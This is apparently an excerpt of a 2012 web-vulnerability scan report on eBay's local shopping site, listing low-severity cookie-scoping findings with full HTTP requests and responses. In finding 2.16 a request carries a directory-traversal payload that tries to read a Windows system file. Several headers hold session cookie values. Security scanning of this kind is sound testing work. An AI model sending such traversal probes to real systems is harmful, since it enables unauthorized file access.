alue":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":99950000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":0,"title":"Monster 127593 Turbine High Performance Headphones - Sound Isolating, Tangle Resistant ","offerIds":"11057129","numLocalStore":1,"lowPriceValue":"$99.95","miloProductOfferModel":[{"merchantTitle":"Tiger Direct","merchantId":13354,"linkUrl":null,"location":{"merchantName":"Tiger Direct","latitude":33.020306,"merchantLogoUrl":"http://milo.com/images/stores/13354.jpg","longitude":-96.738495},"RTPalUrl":null,"price":{"valueInMinorUnits":9995,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":99950000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/13354.png"}],"ratingNode":null},{"highPrice":null,"highPriceValue":null,"productId":6062701,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":30,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":{"value":7,"id":7,"name":"4","integer":7},"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=6062701&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":false,"imageUrl":"http://imagethumbnails.milo.com/006/765/769/200/6765307_15717769_200.jpg","lowPrice":{"valueInMinorUnits":19800,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":198000000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":true},"reviewCount":30,"title":"Fisher-Price Power Wheels Kawasaki KFX","offerIds":"6765307","numLocalStore":1,"lowPriceValue":"$198.00","miloProductOfferModel":[{"merchantTitle":"Sears","merchantId":1609,"linkUrl":null,"location":{"merchantName":"Sears","latitude":33.011124,"merchantLogoUrl":"http://milo.com/images/stores/1609.jpg","longitude":-96.708589},"RTPalUrl":null,"price":{"valueInMinorUnits":19800,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":198000000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":true},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1609.png"}],"ratingNode":"<span class=\"rw\" style=\"height: 12px; background-position: 0pt -10px;\">\n <span class=\"rstar\" style=\"height: 12px; background-position: 0pt 1px; width: 54.0px\"><\/span>\n<\/span><span class=\"revCnt\">(30)<\/span>"}],"ticketModel":null},"zipcode":"75217"}); },vjo.ebay.local.localmap.LocalMap);_d.add('body','load',function(event) { this.init({"leftFsPages":6,"jsId":"localinfoFs","content":true,"rightFs":false,"rightFsPages":0}); },vjo.ebay.local.localinfo.LocalInfo);_d.add('body','load',function(event) { this.init("75217", "1"); },vjo.ebay.local.LocalLandingPage);})();
</script></body></html><!--RcmdId LocalDomain-dcp,RlogId jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3Bc6cb0g-134ac89d77f-->

2.15. http://local.ebay.com/local/images.i  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://local.ebay.com
Path:   /local/images.i

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /local/images.i HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: local.ebay.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 10






Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
RlogId: jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3Bc6cb0g-134ac89cffd
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: ebay=%5Ecv%3D15555%5E; Domain=.ebay.com; Path=/
Set-Cookie: s=CgAD4ACBPBpOAYWM4OWNmZmQxMzQwYTAyYTIzNjdlODc3ZmZmZmU1MjXEitxy; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgADKACBYa0OAYWM4OWNmZmQxMzQwYTAyYTIzNjdlODc3ZmZmZmU1MjUAywABTwVJCDH4wXSd; Domain=.ebay.com; Expires=Fri, 04-Jan-2013 06:24:00 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Length: 960
Date: Thu, 05 Jan 2012 06:23:59 GMT

<html><head><title>Apache Tomcat/5.5.15-150 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The requested resource () is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.15-150</h3></body></html>

2.16. http://local.ebay.com/local/images.i  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://local.ebay.com
Path:   /local/images.i

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /local/images.i?file=../../../../../../../../../..\Windows\System32\Drivers\etc\host.ini HTTP/1.1
Host: local.ebay.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: dp1=bpbf/%2364002081004200000450e672fe^tzo/1684f054d8e^u1p/QEBfX0BAX19AQA**50e672fe^idm/14f065eac^; nonsession=CgAAIABxPLMx+MTMyNDc2OTcwNXgzNTA1MTcxMjAxNDN4MHgyTgDKACBYa0D+NjdhMzMyZGExMzQwYTAyNzZiODFiOGIxZmZmYzFmNWQAywABTwVGhjEBTAAXUOZy/jRmMDUzMmIyLjAuMS40Ljg2LjEuMC4y1SgZjg**; lucky9=2930263; npii=btpim/24f053e54^cguid/6796be8f1340a0a9e8e22482fd53d52a50e66acc^tguid/67a332da1340a0276b81b8b1fffc1f5d50e66acc^trm/svid%3D9115901167250e66acc^; cid=yqK7Xb2N; ns1=BAQAAATSWkMoCAAaAANgATFDmcv5jNzJ8NjAxXjEzMjU3Mzk0MDA3MjNeXjFeM3wyfDY1fDV8NHw3XjFeMl40XjNeMTJeMTJeMl4xXjFeMF4xXjBeMV4yMTQ3NDkxNzc5a7w+n2tMs3vEWG+2Q4ahCe6M+tQ*; ebay=%5Ecv%3D15555%5E; s=CgAD4ACBPBpD+YWM4MDA1N2UxMzQwYTAyYTA5NTFmZTYxZmZmZmU0YzEIFFZZ
Content-Length: 10






Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
RlogId: jh%60djkbkbnmbvfd%60%3C%3Dsm%2Bpu%28c5%3Ba6c0-134ac91711d
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: dp1=bpbf/%2364002081004200000450e67774^tzo/1684f055204^u1p/QEBfX0BAX19AQA**50e67774^idm/14f065eac^; Domain=.ebay.com; Expires=Sat, 04-Jan-2014 06:32:20 GMT; Path=/
Set-Cookie: ns1=BAQAAATSWkMoCAAaAANgATFDmd3RjNzJ8NjAxXjEzMjU3Mzk0MDA3MjNeXjFeM3wyfDY1fDV8NHw3XjFeMl40XjNeMTJeMTJeMl4xXjFeMF4xXjBeMV4yMTQ3NDkxNzc5yMybnQ8T/dZg9CJ35vO9zvWwTNs*; Domain=.ebay.com; Expires=Fri, 04-Jan-2013 06:32:20 GMT; Path=/
Set-Cookie: s=CgAD4ACBPBpV0YWM4MDA1N2UxMzQwYTAyYTA5NTFmZTYxZmZmZmU0YzHHcuFd; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgAAIABxPLND0MTMyNDc2OTcwNXgzNTA1MTcxMjAxNDN4MHgyTgDKACBYa0V0NjdhMzMyZGExMzQwYTAyNzZiODFiOGIxZmZmYzFmNWQAywABTwVK/DIBTAAXUOZ3dDRmMDUzMmIyLjAuMS40Ljg2LjEuMC4yfJyMxQ**; Domain=.ebay.com; Expires=Fri, 04-Jan-2013 06:32:20 GMT; Path=/
Set-Cookie: lucky9=2930263; Domain=.ebay.com; Expires=Tue, 03-Jan-2017 06:32:20 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Length: 960
Date: Thu, 05 Jan 2012 06:32:20 GMT
nnCoection: close

<html><head><title>Apache Tomcat/5.5.15-150 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The requested resource () is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.15-150</h3></body></html>

2.17. http://local.ebay.com/local/localsch.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://local.ebay.com
Path:   /local/localsch.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /local/localsch.html?_nkw=rxss&_fpos=75217&_inclfltr=1 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: local.ebay.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 10






Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3Bc6cb0g-134ac89cf03
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: ebay=%5Ecv%3D15555%5E; Domain=.ebay.com; Path=/
Set-Cookie: s=CgAD4ACBPBpOAYWM4OWNmMDMxMzQwYTAyYTIzNjdlODc3ZmZmZmU1MmIA7gBXTwaTgGh0dHA6Ly9sb2NhbC5lYmF5LmNvbTo4MC9sb2NhbC9sb2NhbHNjaC5odG1sP19ua3c9cnhzcyZfZnBvcz03NTIxNyZfZmxwcmFkPTI1LjAmX2NhdGlkPVnd7ZM*; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgADKACBYa0OAYWM4OWNmMDMxMzQwYTAyYTIzNjdlODc3ZmZmZmU1MmIAywABTwVJCDGIXQhU; Domain=.ebay.com; Expires=Fri, 04-Jan-2013 06:24:00 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 27766
Date: Thu, 05 Jan 2012 06:23:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>eBay - rxss</title><link href="http://www.ebay.com/favicon.ico" rel="icon" type="image/ico"><link href="/local/localcss.css" rel="stylesheet" type="text/css"></head><body id="body"><!--[if lt IE 8 ]> <style type="text/css"> .srpbt{position:relative;width:1%;margin:10px 0 0} .srpi {width:411px} .srpi input{width:295px;} </style><![endif]--><div id="ff-body" class="bdy"><script type="text/javascript">var _GlobalNavHeaderUtf8Encoding=true;</script><script type="text/javascript">var includeHost="http://include.ebaystatic.com/";</script><link rel="stylesheet" type="text/css" href="http://ir.ebaystatic.com/v4css/z/2s/3zhykpa5ca0zthsnrhjg02hpi.css"><script src="http://ir.ebaystatic.com/v4js/z/yo/qicc5beyw2zejm0u4bus2lv3u.js"></script><script type="text/javascript" src="http://ir.ebaystatic.com/v4js/z/qz/kjtciulcyi4gtcfxjs5s2k33m.js"></script><!--[if lt IE 7 ]><div id='gnheader' class='gh-w ie6'><![endif]--><!--[if IE 7]><div id='gnheader' class='gh-w ie7'><![endif]--><!--[if (gt IE 7)|!(IE)]><!--><div id="gnheader" class="gh-w"><!--<![endif]--><a href="#mainContent" rel="nofollow" class="g-hdn">Skip to main content</a><div><div class="gh-eb"><div class="gh-emn"><div class="gh-hid"></div><div class="gh-mn"><span class="gh-fst"><a id="MyEbay" href="http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1" _sp="m570.l2919">My eBay</a></span><a id="Sell" href="http://cgi5.ebay.com/ws/eBayISAPI.dll?aidZ153=&amp;MfcISAPICommand=SellHub3" _sp="m570.l1528">Sell</a><a id="Community" href="http://community.ebay.com" _sp="m570.l1540">Community</a><span class="gh-nho"></span><a id="Help" href="http://ocs.ebay.com/ws/eBayISAPI.dll?CustomerSupport" _sp="m570.l1545">Customer Support</a><span class="gh-nho"><span class="gh-sc" style="display:none" id="GH_Cart"><a href="http://payments.ebay.com/ws/eBayISAPI.dll?ShopCart&amp;ssPageName=CART:HDR"><img src="http://p.ebaystatic.com/aw/pics/buy/cart/iconCart000.gif" alt="Your shopping cart" border="0" height="24" width="31"></img>Cart</a></span><script type="text/javascript">vjo.darwin.globalnav.shoppingcart.ShoppingCart.RefreshCart()</script></span></div></div><form id="headerSearch" name="headerSearch" method="get" action="http://www.ebay.com/sch/i.html"><input type="hidden" name="_from" value="R40"><input type="hidden" name="_trksid" value="m570.l2736"><span class="gh-esb"><label for="_nkw" class="g-hdn">Enter your search keyword</label><input type="text" class="gh-txt" name="_nkw" id="_nkw"><a><input type="submit" value="Go" class="gh-go"></a></span></form></div><div class="gh-log"><span class="gh-lg"><a id="EbayLogo" href="http://www.ebay.com" _sp="m570.l2586"><img src="http://p.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif" alt="eBay" border="0" height="45" width="110"></img></a></span><span class="gh-wrap"><span class="gh-shim"></span><span class="greeting gh-ui"><script type="text/javascript">vjo.darwin.core.greetings.VjGreetingsClient.writePersonalHeader("Sign in", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "register", "https://scgi.ebay.com/ws/eBayISAPI.dll?RegisterEnterInfo", "Sign out", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "Welcome! ##1## or ##2##.", "Hi, <b>##1##<\/b>! (##2##)", "Hi, <b>##1##<\/b>! (<a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l2620\">Not you<\/a>?)", "Hello! <a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l1524\">Sign in/out<\/a>.", "<img src=\"http://p.ebaystatic.com/aw/pics/icon/iconWarnRed_16x16.gif\" height=\"16\" width=\"16\" alt=\"Alert\">", "<span id=\"bta\">##1##<\/span>", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alert<\/a>.", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alerts<\/a>.", "1", "", true)</script></span><span class="coupon rebate" id="rbt" style="display:none"><img src="http://p.ebaystatic.com/aw/pics/promo/magic/pmoGleam10_150x23.gif" alt="Coupon" border="0" height="23" width="150"></img><!--googleoff: all--> Must use Buy It Now and PayPal.<br/><a href="http://pages.ebay.com/cashbackoffer/terms.html" _sp="m570.l2735">See conditions</a><!--googleon: all--><script type="text/javascript">vjo.darwin.core.ebayheader.rebate.RebateBox.Refresh("rbt", "10", "<img src=\"http://q.ebaystatic.com/aw/pics/icons/iconRedeemCoupon20x20.gif\" alt=\"Coupon\" border=\"0\" height=\"20\" width=\"20\"><\/img><a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyeBay&amp;CurrentPage=MyeBayIncentives&amp;gbh=1\" _sp=\"m570.l2735\">You have coupons available<\/a>")</script></span></span></div><div></div></div><div class="gh-cl"></div><div><div class="gh-col"><b class="gh-c1"></b><b class="gh-c2"></b><b class="gh-c3"></b><b class="gh-c4"></b><b class="gh-c5"></b><b class="gh-c6"></b><b class="gh-c7"></b><div class="gh-clr"></div></div><div id="headerWrapper" class="gh-hbw"><div class="gh-hb"><div class="gh-mn"><a id="BrowseCategories" href="http://shop.ebay.com/allcategories/all-categories" _sp="m570.l1620">CATEGORIES</a><a id="chevron0" href="javascript:;" class="gh-ai"><b>&nbsp;</b></a><a id="EbayElectronics" title="Your shopping destination for the best selection and value in electronics and accessories" href="http://www.ebay.com/electronics/" _sp="m570.l2959">ELECTRONICS</a><span id="11450_sp"><a title="Your new destination for Clothing, Shoes &amp; Accessories on eBay." href="http://www.ebay.com/fashion/" _sp="m570.l2624">FASHION</a></span><a id="6000_sp" title="Buy and sell cars, trucks, vehicle parts, and accessories." href="http://www.motors.ebay.com/" _sp="m570.l2597">MOTORS</a><a id="EbayTickets" title="Tickets ... Sports, Concerts, Theater and More on eBay" href="http://www.ebay.com/tickets" _sp="m570.l1624">TICKETS</a><a id="172382_sp" title="Great items, deep discounts, and free shipping!" href="http://deals.ebay.com/" _sp="m570.l2625">DEALS</a><a id="EbayClassifieds" href="http://www.ebayclassifieds.com" _sp="m570.l2626">CLASSIFIEDS</a></div></div><div class="gh-lbh1"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_876"></div></div></div><div class="gh-lbh2"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_912"></div></div></div><div class="gh-lbh3"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_433"></div></div></div><div class="gh-clr"></div></div><img src="http://rover.ebay.com/roversync/?site=0&amp;stg=1&amp;mpt=1325720851249" alt="" width="1" height="1"><script type="text/javascript">var svrGMT = 1325720851249;var scbps=0;var scPageName='GlobalHeader:3872';</script><div class="gh-ovr" id="gbh_ovl"><div class="gh-iovr"></div></div></div><a name="mainContent"></a></div><script src="http://include.ebaystatic.com/js/e723/us/ebaybase_v4_e7231us.js"></script><script src="http://include.ebaystatic.com/js/e681/us/ebaysup_e6811us.js"></script><script type="text/javascript">if(document.documentMode != 8 && document.compatMode != "CSS1Compat") ebay.oDocument._getControl("headerCommon")._exec("writeStyleSheet");</script><script type="text/javascript">vjo.Registry.put('bta', new vjo.darwin.globalnav.bta.BuyerTransactionAlert("bta", 60, 2, 2, "http://bmsgs.ebay.com/ws/eBayISAPI.dll?GetBuyerTransactionAlerts", "http://q.ebaystatic.com/aw/pics/", "http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem", "Watched Item ending soon!", "You've been outbid!", "You've received a Second Chance Offer", "You've received a Transaction Confirmation Request."));
vjo.darwin.globalnav.util.EventReg.aggregate(vjo.Registry._bta.onRefreshHdl());
vjo.darwin.globalnav.util.EventReg.browseCategories("BrowseCategoriesMenu", "http://include.ebaystatic.com/categoryjs/99/en_US_MAIN/category_99en_US_MAIN0.js");
vjo.darwin.globalnav.util.EventReg.impression("AHtMRZjo*");
</script><script type="text/javascript">vjo.darwin.globalnav.util.DoctypeSupport.init();</script><script type="text/javascript">var _oGlobalNavRTMInfo={};_oGlobalNavRTMInfo.aRTMPlacementData=[];_oGlobalNavRTMInfo.aRTMPlacementData=[{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_433","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"433","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_876","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"876","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_912","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"912","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1650","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1650","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1651","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1651","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false}];</script><!--@sghp@ headerStyle=HALF:HOMEPAGE:CGI @eghp@--><div id="CenterPanel" class="cntr"><div id="LeftNav" class="lnav">
<!-- <fontT><h1 class="locs">Local Shopping</h1></fontT> -->
<a href="/local" class="locs">
   <img src="/local/images.i?file=LocalShoppingRibbon.png" />
   </a>
<!-- <form action="/localsch.html" name="distanceForm" id="distanceForm" class="sForm">-->
<div name="distanceForm" id="distanceForm" class="sForm">
   
           <input class="zipcode" autocomplete="off" name="_location" id="_location" value=", 75217">
           <div id="autocomplete" class="autocomplete"></div>
       
    <input type="hidden" id="_fpos" name="_fpos" value="75217">
        <input name="zipSub" type="button" value="" class="disSub">
        <div class="clr"></div>
<!-- <div class="cnz">
   <div id="citystate" style="float:left">, 75217</div>
   <div class="pd" style="float:left"></div>
   <div style="clear:both"></div>
   
</div> -->
<input type="hidden" id="zip" value="75217">
<!--<input name="_fpos" id="_fpos" value="75217" maxlength="5"></span> <input type="submit" value="" class="disSub">-->
   <div class="horizontal_track">
   <div class="horizontal_slit">
       <div id="progress" class="slider_bar" style="width:121.8px">&nbsp;</div>
   </div>
   <div class="simg" id="slider" style="left:91px" onmousedown="slide(event, 'slider', -16, 128, 'display', 'progress', 12);">
       <div id="display" class="disp" onmousedown="slide(event, 'slider', -16, 128, 'display', 'progress', 12);">25 miles</div>
       <input type="hidden" value="25" name="_flprad" id="_flprad">
       </div>
   </div>
   </div>
<div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div style="padding : 5px 0 0 10px"><a style="font-size:13px;font-weight:bold;color:#002398;display:none" href="/local/localsch.html?_nkw=rxss&amp;_fpos=75217&amp;_inclfltr=1" id="clr" name="clrfltr">Clear all refinements</a></div><div style="padding:5px 0 5px 10px;font-family:Arial;font-weight:bold;font-size:12px;color:#333333"><h4 style=" margin: 0 0 10px;">By Price :</h4><div id="pFil"><span style="padding-right:5px;">$</span><input type="text" id="_sp" name="_sp" size="3" value="" style="margin:0;"><span style="padding: 0 5px;">to $</span><input id="_ep" name="_ep" type="text" size="3" value="" style="margin:0 3px 0 0;"><input type="button" class="disSub disSubDis" name="bP" id="bP" value=""></div></div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div><div class="ifltr-W">
   <h4 class="ifltr-hdr">Include only</h4>
   
   <div class="ifltr-lst">
       <ul>
           <li>
               <input type="radio" name="inclFltr" checked=checked value="1">
               <span>Local Retailers</span>
           </li>
           <li>
               <input type="radio" name="inclFltr" value="0">
               <span>eBay Sellers</span>
           </li>            
       </ul>
   </div>
</div></div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div>    
   
   
       <div class="cat-W">
           <H4 class="cat-hdr">By Category</H4>
           <div class="cat-lst">
               <ul id="parUl">
                   
                   <li>
                   
                       
                       <a href="javascript:;" clk="1" class="ch"></a><a href="http://local.ebay.com:80/local/localsch.html?_trksid=p5791.m1&_catid=12576&_location=75217&_nkw=rxss">Business & Industrial</a>                        
                                   
                       
                           <ul class="dn">
                               
                                   <li>                                        
                                       <a href="http://local.ebay.com:80/local/localsch.html?_trksid=p5791.m1&_catid=11765&_location=75217&_nkw=rxss">Construction </a>                                        
                                   </li>
                               
                           </ul>
                       
                       
                   </li>
                   
                   
               </ul>
           </div>
       </div>

       </div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div>
<div class="fltr-W">
   <h4 class="fltr-hdr">BRAND</h4>
   <div class="fltr-lst">    
        <div name="filterForm" id="filterForm" style="max-height:250px;overflow:hidden">
           <div style="position:absolute;width:5px;right:5px;top:0;height:100%;z-index:1;">
                       <div id="dragelm" style="position: absolute; display:none;width: 5px; height: 30px; background: none repeat scroll 0% 0% #333; right: 0pt; top: -1px; left: 0px;">
                       </div>
           </div>
           <ul id="brandUl">            
               
               

               <li>                            
                        <div class="cb">    
                           <a href="javascript:;" title="Roxul" brand="Roxul" class=" ">Roxul</a>
                        </div>    
                       
               </li>

           
                       
           </ul>
       </div>
   </div>
</div></div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div id="fs">
<h4 class="fsHeader">Local Retailers :</h4><div class="fs" id="fs">
<span class="preS"><a class="pre db" id="pre" href="javascript:;"></a></span>
<div class="cntWrap" id="cntWrap">
<div class="cnt" id="cnt"><a href="javascript:;" title="Lowe's"><img class="" src="http://static.milo.com/20111201145320/images/store_icons/flat_by_id/4483.png" merchant="4483" en="1" /><div class="msk"></div></a>
</div>
</div><span class="nextS"><a class="next db " id="next" href="javascript:;"></a></span>
<div class="clr"></div>
</div>
</div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div style="padding:5px 0 10px 20px"><a href="http://www.ebay.com/sch/i.html?_nkw=rxss" target="blank" style="font-size:13px;font-weight:bold;color:#003dac;">View results on ebay.com</a></div></div><div class="cont"><div style="float:left"><div>

<div class="srpbx1">
       <form action="/local/localsch.html" method="get" onsubmit="return vjo.ebay.local.LocalLandingPage.onSubmit();">
           <div>
               <div style="float:right">
                   <input type="submit" id="but" value="Search" class="srpbt" tabindex="2" />
               </div>
               <div class="srpi srchbox">
                   <input type="text" id="txt" name="_nkw" placeholder="Search locally " value='rxss' autofocus="autofocus" autocomplete="off" tabindex="1" />
               </div>
               
               
               
               
                   <input type="hidden" value="75217" name="_fpos">
               
               
               
                   <input type="hidden" value="rxss" name="_odkw">
                   
                                                                                   
           </div>
       </form>
</div></div><div id="localResults" class="results"><div id="LocalProductResultSet" class="bgshd"><div><div style="padding:5px; background-color:#F5F5F5" tt="188"><div style="font-size: 13px; font-family: Arial; padding: 3px 0 0 0; color: #333333;float:left">2 results found</div><div><div class="toppg" id="v4-37">
       <div>Page <b>1</b> of <b>1</b></div>
       <span>
           <a class="toppg-p toppg-pd" id="pg-p" type="prev" enabled="false">
           </a>
       </span>
       <span>
           <a class="toppg-n toppg-nd" href="javascript:;" id="pg-n" type="next" enabled="false">
           </a>
       </span>
</div></div><div style="margin-top:2px; float:right"><div></div><div style="clear:both"></div></div><div style="clear:both"></div></div></div><div>
<div class="lstWrap" id="lstWrap">

<div class="lst" type="products" id="item_1" offers="10585778">
<table cellspacing="0" cellpadding="0" border="0">
   <tr class="lstTr">
       <td class="imgContTd">
           <a href="javascript:;">
               <img width="140" height="140" border="0" alt="TEST TUBE WONDERS" src="http://imagethumbnails.milo.com/010/585/025/200/10585778_13912025_200.jpg" />
           </a>
       </td>
       <td>
           <div class="lstInfo">
               <div class="ttlDiv"><a class="ttl" target="_blank" title='Roxul 12-Pack 15.25"W x R-0 Fiberglass Insulation Batts' href="http://www.ebay.com/ctg/mp.html?_flppid=9436383&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m2&_fpos=75217">Roxul 12-Pack 15.25"W x R-0 Fiberglass Insulation Batts</a></div>
               <div><span class="rw" style="height: 12px; background-position: 0pt -10px;">
